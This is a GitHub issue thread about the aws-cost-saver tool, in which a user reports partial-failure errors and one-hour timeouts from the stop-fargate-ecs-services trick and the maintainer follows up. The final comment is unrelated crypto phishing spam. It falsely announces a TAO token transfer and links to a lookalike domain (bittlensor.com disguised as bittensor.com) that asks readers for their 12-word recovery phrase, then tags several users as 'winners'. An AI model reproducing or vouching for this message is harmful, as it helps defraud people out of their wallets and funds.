### ISSUE TITLE
Issue: Error on stop-fargate-ecs-services

### ISSUE THREAD

**Issue by karthikholla** [aramalipoor/aws-cost-saver#34]
Version - _**aws-cost-saver@0.1.0**_
Service/Trick - **_stop-fargate-ecs-services_**

I have around 23 ECS tasks running. The current latest version is throwing this error though the stop-fargate-ecs-services is successful and in AWS I could see all tasks desired count is set to 0.
I guess this is because of some timeout settings.

Error - 
_`✔ partially finished, with 1 failed tricks out of 3.`_

```
◎ conserve: stop-fargate-ecs-services
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
  ✔ service/*******
   ✔ desired count
   set desired count to zero
   ↓ auto scaling
    ↓ no scalable targets defined
************************
✔ partially finished, with 1 failed tricks out of 3.
    Error: ConservePartialFailure
```

**Comment by aramalipoor** [comment]
Hi @karthikholla, based on your comment are you not seeing this on 0.1.0 and only on latest [0.2.1 version](https://www.npmjs.com/package/aws-cost-saver)?

**Comment by karthikholla** [comment]
@aramalipoor Just an update to the same issue. 
I have around 30+ Fargate tasks that get stopped and started back again as part of the ECS trick. 
The issue is the trick is expecting all the fargate tasks to be scaled down and waits for them which results in 1hr timeout limit. Can the trick just change the desired count and expect it to take care by AWS to scaledown at its own phase rather than waiting for it.


```
  Dry run: no
❯ running in the background, the summary will be printed at the end...
ERROR: Job failed: execution took longer than 1h0m0s seconds
```

**Comment by consejeriaescolar** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @ww-Jing, @tlowrimore, @wngaw, @tommy-ca, @martinvarelaaaa, @xxm-wu, @jazzlost
